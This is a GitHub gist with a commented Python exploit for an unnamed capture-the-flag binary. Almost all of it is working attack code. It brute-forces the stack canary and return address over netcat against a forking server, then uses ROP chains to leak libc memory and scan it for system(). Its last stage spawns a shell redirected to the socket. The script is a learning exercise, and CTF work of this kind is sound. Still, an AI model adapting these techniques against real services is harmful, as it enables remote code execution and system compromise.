Skip to content

Instantly share code, notes, and snippets.

@thedroidgeek

thedroidgeek/pwnable1.py

Last active Feb 22, 2019
Embed
What would you like to do?
#!/usr/bin/env python
#
# learning python and making use of my ocd by sharing heavily commented scripts
# i've probably spent too much time on because i had nothing better to do (part 1):
# solution for a pwn challenge (the name of which is intentionally omitted to prevent spoilers)
# binary: https://bit.ly/2Pdu90o
#
# by Sami Alaoui (thedroidgeek)
#
import os
import sys
import time
import struct
import threading
import subprocess
def syncstdin(o):
while True:
line = sys.stdin.readline()
if line:
o.stdin.write(line)
def syncstdout(o):
while True:
line = o.stdout.readline()
if line:
sys.stdout.write(line)
def spawn_process(debug=False):
# spawn netcat process
p = subprocess.Popen(['nc', host, port], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# check we got a valid session
if 'Username: ' not in p.stdout.read(10):
print('unexpected nc output - check your connectivity')
exit()
# delay for debugger attachment
if debug:
print('waiting for debugger (pid: ' + str(p.pid+1) + ')...')
time.sleep(10)
return p
def finalize_payload(payload):
# input buffer gets single byte xored with 0xD before memcmp
for i in range(len(payload)):
payload = payload[:i] + chr(ord(payload[i]) ^ 0xD) + payload[i+1:]
return payload
def sig_scan(buf, sig):
bytes = ''
mask = []
# extract byte array + mask from sig string
str_bytes = sig.split()
for sb in str_bytes:
if sb == '?':
mask.append(False)
bytes += '\0'
else:
mask.append(True)
bytes += chr(int(sb[0:2], 16))
# buffer can't be smaller than sig
if len(buf) < len(mask):
return None
# scan the supplied buffer
for i in range(len(buf)-(len(mask)-1)):
for j in range(len(mask)):
if mask[j] and buf[i+j] != bytes[j]:
break
if j == len(mask)-1:
return i
return None
def main():
if len(sys.argv) != 3:
print('usage: ' + sys.argv[0] + ' [host] [port]')
exit()
global host
host = sys.argv[1]
global port
port = sys.argv[2]
# connectivity test
spawn_process().stdin.write('\n')
#
# stage 1: bruteforce the stack canary, previous base pointer, and the return address
# in order to bypass ASLR - this is possible because the process forks itself
# on each socket connection, which implies preserving the address space layout
# of the parent process, which allows us to guess stack saved info by simply
# knowing whether the program successfully returned from a function call, or not
# (by expecting output from the caller function - 'Username found!', in our case)
#
# note: bruteforcing the return address (last 8 bytes), however, is done by using the
# check_username function call as an oracle (expect 'Username: ' in stdout):
# .text:0000XXXXXXXXXEC5 mov eax, [rbp+fd]
# .text:0000XXXXXXXXXEC8 mov edi, eax
# .text:0000XXXXXXXXXECA call check_username
# we use EC5 as the least significant '3 hex digits' (ASLR doesn't affect these)
# to eliminate the chance of accidentally calling unexpected blocking code,
# which would otherwise freeze the bruteforcing process...
#
print('bruteforcing stack canary, saved rbp, and retn address (24 bytes)')
print('hang tight, this could take a while...')
payload = 'davide' # the username (oracle trigger)
payload += 'A' * 1026 # padding
oracle_str = 'Username found!'
for i in range(24):
found = False
iter_num = 0x100
if i == 16: # 1st known ret addr byte
byte = 0xC5 ^ 0xD
print('skipped #' + str(i+1) + ': ' + hex(byte))
payload += chr(byte)
continue
elif i == 17: # 2nd half-known byte
iter_num = 0x10
oracle_str = 'Username: ' # oracle change
for j in range(iter_num):
p = spawn_process()
if i == 17: # most significant nibble
curr_byte = j << 4 | 0xE ^ 0xD
else:
curr_byte = j
p.stdin.write(payload + chr(curr_byte))
if oracle_str == p.stdout.read(len(oracle_str)):
found = True
print('got byte #' + str(i+1) + ': ' + hex(curr_byte))
payload += chr(curr_byte)
if i > 16: # don't leave hanging prompts
p.stdin.write('\n')
break
if not found:
print('failed to get byte #' + str(i+1) + ' :(')
exit()
stack_canary = struct.unpack('<Q', payload[1032:1040])[0] ^ 0xD0D0D0D0D0D0D0D
stack_addr = struct.unpack('<Q', payload[1040:1048])[0] ^ 0xD0D0D0D0D0D0D0D
check_func = struct.unpack('<Q', payload[1048:1056])[0] ^ 0xD0D0D0D0D0D0D0D
print('canary: ' + hex(stack_canary))
print('saved rbp: ' + hex(stack_addr))
print('check_username call @ ' + hex(check_func))
#
# stage 2: leak a libc function's address to bypass ASLR on libc
# using a rop chain that calls write(4, ...) on a function's .plt.got entry
# note that '4' is the file descriptor returned from the socket accept() call
#
print('leaking a libc address from .plt.got...')
p = spawn_process()
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret
payload += struct.pack('<Q', 4) # 1st arg (rdi): file descriptor (socket)
payload += struct.pack('<Q', check_func + 0xAC) # pop rsi ; pop r15 ; ret
payload += struct.pack('<Q', check_func + 0x2011C3) # 2nd arg (rsi): buffer (atoi() entry on .plt.got)
payload += struct.pack('<Q', 0) # r15, unused
payload += struct.pack('<Q', check_func - 0x372) # pop rdx ; ret
payload += struct.pack('<Q', 8) # 3rd arg (rdx): count (sizeof(void*))
payload += struct.pack('<Q', check_func - 0x5B5) # write()
payload += 'A' * 968
payload += struct.pack('<Q', stack_canary)
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain (saved rbp)
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret (to rewind stack)
p.stdin.write(finalize_payload(payload))
libc_atoi = struct.unpack('<Q', p.stdout.read(8))[0]
print('atoi @ ' + hex(libc_atoi))
#
# stage 3: leak memory around the libc function to scan for system() with a signature
# since libc versions (and therefore offsets) differ across machines/distros
#
print('leaking 0x40000 bytes of libc memory...')
p = spawn_process()
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret
payload += struct.pack('<Q', 4) # file descriptor
payload += struct.pack('<Q', check_func + 0xAC) # pop rsi ; pop r15 ; ret
payload += struct.pack('<Q', libc_atoi - 0x20000) # buffer
payload += struct.pack('<Q', 0) # r15
payload += struct.pack('<Q', check_func - 0x372) # pop rdx ; ret
payload += struct.pack('<Q', 0x40000) # count
payload += struct.pack('<Q', check_func - 0x5B5) # write()
payload += 'A' * 968
payload += struct.pack('<Q', stack_canary)
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret
p.stdin.write(finalize_payload(payload))
libc_dump = p.stdout.read(0x40000)
if len(libc_dump) == 0:
print('failed to receive bytes :(')
exit()
print('scanning for system()...')
offset = sig_scan(libc_dump, '''48 85 FF 74 0B E9 ? ? ? ? 66 0F 1F 44 00 00 ? ? ? ? ? ? ? ? ? ? ?
E8 ? ? ? ? 85 C0 0F 94 C0 48 83 C4 08 0F B6 C0 C3''')
if offset is None:
print('failed to find system() :(')
exit()
system_addr = libc_atoi + offset - 0x20000
print('found system() at offset ' + hex(offset) + ' (' + hex(system_addr) + ')')
#
# stage 4: spawn a shell with stdin, stdout and stderr all redirected to
# to the socket file descriptor (4), so we can actually interact with it
#
print('popping a shell...')
cmd_str = '/bin/sh 0>&4 1>&4 2>&4'
p = spawn_process()
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret
payload += struct.pack('<Q', stack_addr - 0x79 - len(cmd_str)) # command string address
payload += struct.pack('<Q', system_addr) # system()
payload += 'A' * (1007 - len(cmd_str))
payload += cmd_str + '\0' # the actual command string, null terminated
payload += struct.pack('<Q', stack_canary)
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret
p.stdin.write(finalize_payload(payload))
# hi linux
p.stdin.write('uname -a\n')
# emulate an interactive shell
stdint = threading.Thread(target=syncstdin, args=(p,))
stdoutt = threading.Thread(target=syncstdout, args=(p,))
stdint.daemon = True
stdoutt.daemon = True
stdint.start()
stdoutt.start()
# wait for nc session to terminate
p.wait()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment